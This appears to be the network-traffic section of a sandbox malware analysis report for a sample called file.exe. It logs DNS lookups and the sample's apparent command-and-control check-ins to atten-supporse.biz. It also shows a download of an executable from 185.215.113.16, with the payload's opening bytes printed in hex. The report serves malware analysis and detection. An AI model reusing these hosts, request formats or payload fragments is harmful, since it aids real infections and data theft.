                                                                                                                                                                                                        Dec 2, 2024 07:39:28.449959040 CET49929443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.450040102 CET49930443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.450090885 CET4434993013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.450104952 CET49929443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.450114012 CET4434992913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.450145960 CET49930443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.450309038 CET49930443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.450323105 CET4434993013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.677884102 CET4434992613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.681066990 CET4434992613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.681119919 CET49926443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.681145906 CET4434992613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.681162119 CET4434992613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.681210995 CET49926443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.681278944 CET49926443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.681291103 CET4434992613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.681308031 CET49926443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.681313038 CET4434992613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.685276031 CET49931443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.685317993 CET4434993113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.685390949 CET49931443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.685539961 CET49931443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:28.685554981 CET4434993113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.240153074 CET4434992713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.240763903 CET49927443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.240784883 CET4434992713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.241277933 CET49927443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.241282940 CET4434992713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.674882889 CET4434992713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.678461075 CET4434992713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.678534985 CET49927443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.678577900 CET49927443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.678592920 CET4434992713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.678606033 CET49927443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.678611994 CET4434992713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.681886911 CET49932443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.681938887 CET4434993213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.682216883 CET49932443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.682379961 CET49932443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:29.682395935 CET4434993213.107.246.63192.168.2.8
                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Dec 2, 2024 07:37:26.044024944 CET6192653192.168.2.81.1.1.1
                                                                                                                                                                                                        Dec 2, 2024 07:37:26.292392015 CET53619261.1.1.1192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:03.002446890 CET138138192.168.2.8192.168.2.255
                                                                                                                                                                                                        Dec 2, 2024 07:38:07.325196981 CET53597401.1.1.1192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:07.343697071 CET53554801.1.1.1192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:10.226103067 CET53636111.1.1.1192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:10.845884085 CET6441553192.168.2.81.1.1.1
                                                                                                                                                                                                        Dec 2, 2024 07:38:10.846142054 CET6178353192.168.2.81.1.1.1
                                                                                                                                                                                                        Dec 2, 2024 07:38:10.984250069 CET53644151.1.1.1192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:10.985213995 CET53617831.1.1.1192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.697117090 CET5034253192.168.2.81.1.1.1
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.697258949 CET5795353192.168.2.81.1.1.1
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.781439066 CET6112653192.168.2.81.1.1.1
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.781629086 CET5949953192.168.2.81.1.1.1
                                                                                                                                                                                                        Dec 2, 2024 07:38:22.613054037 CET53496401.1.1.1192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:25.200963020 CET6025053192.168.2.81.1.1.1
                                                                                                                                                                                                        Dec 2, 2024 07:38:25.201390028 CET5407753192.168.2.81.1.1.1
                                                                                                                                                                                                        Dec 2, 2024 07:38:27.332247972 CET53546731.1.1.1192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:46.143801928 CET53626541.1.1.1192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.349384069 CET53632051.1.1.1192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:08.799002886 CET53539021.1.1.1192.168.2.8
                                                                                                                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                        Dec 2, 2024 07:38:15.015527010 CET192.168.2.81.1.1.1c2b8(Port unreachable)Destination Unreachable
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        Dec 2, 2024 07:37:26.044024944 CET192.168.2.81.1.1.10x451fStandard query (0)atten-supporse.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:10.845884085 CET192.168.2.81.1.1.10x309Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:10.846142054 CET192.168.2.81.1.1.10xfa5dStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.697117090 CET192.168.2.81.1.1.10xc0cfStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.697258949 CET192.168.2.81.1.1.10x53d6Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.781439066 CET192.168.2.81.1.1.10xa7efStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.781629086 CET192.168.2.81.1.1.10x9fceStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:25.200963020 CET192.168.2.81.1.1.10x48aeStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:25.201390028 CET192.168.2.81.1.1.10xf3a2Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        Dec 2, 2024 07:37:26.292392015 CET1.1.1.1192.168.2.80x451fNo error (0)atten-supporse.biz104.21.16.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:37:26.292392015 CET1.1.1.1192.168.2.80x451fNo error (0)atten-supporse.biz172.67.165.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:10.984250069 CET1.1.1.1192.168.2.80x309No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:10.985213995 CET1.1.1.1192.168.2.80xfa5dNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.834666967 CET1.1.1.1192.168.2.80x8963No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.834666967 CET1.1.1.1192.168.2.80x8963No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.834666967 CET1.1.1.1192.168.2.80x8963No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.835935116 CET1.1.1.1192.168.2.80xc0cfNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.835935116 CET1.1.1.1192.168.2.80xc0cfNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.835935116 CET1.1.1.1192.168.2.80xc0cfNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.835935116 CET1.1.1.1192.168.2.80xc0cfNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.837245941 CET1.1.1.1192.168.2.80x53d6No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.837245941 CET1.1.1.1192.168.2.80x53d6No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:15.015388012 CET1.1.1.1192.168.2.80x1738No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.561889887 CET1.1.1.1192.168.2.80xcdcaNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.561889887 CET1.1.1.1192.168.2.80xcdcaNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.561889887 CET1.1.1.1192.168.2.80xcdcaNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.563400030 CET1.1.1.1192.168.2.80xa437No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.920958042 CET1.1.1.1192.168.2.80xa7efNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.920958042 CET1.1.1.1192.168.2.80xa7efNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.920958042 CET1.1.1.1192.168.2.80xa7efNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.920958042 CET1.1.1.1192.168.2.80xa7efNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.923855066 CET1.1.1.1192.168.2.80x9fceNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.923855066 CET1.1.1.1192.168.2.80x9fceNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:25.447038889 CET1.1.1.1192.168.2.80xf3a2No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:25.448304892 CET1.1.1.1192.168.2.80x48aeNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:28.907145023 CET1.1.1.1192.168.2.80x9f46No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:28.928834915 CET1.1.1.1192.168.2.80x70c9No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:35.701716900 CET1.1.1.1192.168.2.80xacfcNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 2, 2024 07:38:35.705909967 CET1.1.1.1192.168.2.80xe08aNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        • atten-supporse.biz
                                                                                                                                                                                                        • slscr.update.microsoft.com
                                                                                                                                                                                                        • fs.microsoft.com
                                                                                                                                                                                                        • https:
                                                                                                                                                                                                          • js.monitor.azure.com
                                                                                                                                                                                                          • wcpstatic.microsoft.com
                                                                                                                                                                                                        • otelrules.azureedge.net
                                                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.2.849719185.215.113.16806376C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Dec 2, 2024 07:37:53.188797951 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Host: 185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.582770109 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:37:54 GMT
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Content-Length: 2848256
                                                                                                                                                                                                        Last-Modified: Mon, 02 Dec 2024 06:31:04 GMT
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        ETag: "674d5428-2b7600"
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2c 00 00 04 00 00 cb 07 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ ,,`Ui` @ @.rsrc`2@.idata 8@tlfljndr ++:@pcyievjx +P+@.taggant@+"T+@
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.582850933 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.583735943 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.583801985 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.583811998 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.584578037 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.584662914 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.584673882 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.585577011 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.585611105 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Dec 2, 2024 07:37:54.702955961 CET1236INData Raw: aa 41 76 5d bd 87 31 2c 51 a7 9b 54 70 96 63 70 8f f7 45 04 9c 62 7e 59 0f 98 1e 01 01 a8 aa 4b 7e 6d 43 0b 1c 8d 5f af 56 8b f6 75 65 9e 5f 7a 9c 77 2f 07 a2 0a 32 0e 5b 67 11 88 99 81 a8 10 8b 74 4a 3b 50 67 16 a8 39 90 81 88 99 81 a8 9e 8a 78
                                                                                                                                                                                                        Data Ascii: Av]1,QTpcpEb~YK~mC_Vue_zw/2[gtJ;Pg9xJTg<44j|)gV61u"(k035Jz`id'Fz8ruqUU4J`ue=J~[F1i1!)esy? 3~+4lkO1Npt6hg<]}?Q<


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.2.849705104.21.16.94436376C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:37:27 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                        Host: atten-supporse.biz
                                                                                                                                                                                                        2024-12-02 06:37:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                        2024-12-02 06:37:28 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:37:28 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: PHPSESSID=cumsr4tb05ev60sq4pq7l880tb; expires=Fri, 28-Mar-2025 00:24:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P1zWdHnuf2lRuveWcK34NfgyFdW%2FySKF0J5X3yR6IZNNqQvGzG5isgpmKweAl9%2BmsbmDqjWQK1N8GIJTO6z%2F87%2BUUC%2BUWVRvkxxwxYnlRvwZcwwom5UVgw5m50MoTfX1kTFp72g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8eb94ef93ab07271-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1815&rtt_var=684&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1596500&cwnd=225&unsent_bytes=0&cid=0f4f72fb187a3784&ts=837&x=0"
                                                                                                                                                                                                        2024-12-02 06:37:28 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                        2024-12-02 06:37:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        1192.168.2.849706104.21.16.94436376C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:37:29 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 53
                                                                                                                                                                                                        Host: atten-supporse.biz
                                                                                                                                                                                                        2024-12-02 06:37:29 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                        2024-12-02 06:37:30 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:37:30 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: PHPSESSID=ck7s8r2g9qkdpe8r7dlak3tpqd; expires=Fri, 28-Mar-2025 00:24:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r5UWupM839d3tx%2Bd0H5MpL3Saaf%2FJxwXOR9KUSbmkWLNenQIEt1kDmaZPM6L2lLAZrwu%2BGL%2BbUpCzlVdk53jI0sWMR60ffwzehZZb0LaXQ2GeN%2BwRR2rv9avlGGREZWwJD0eDk0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8eb94f078fe28c4e-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2027&min_rtt=2025&rtt_var=763&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1429970&cwnd=205&unsent_bytes=0&cid=cb2dcad75c98646f&ts=821&x=0"
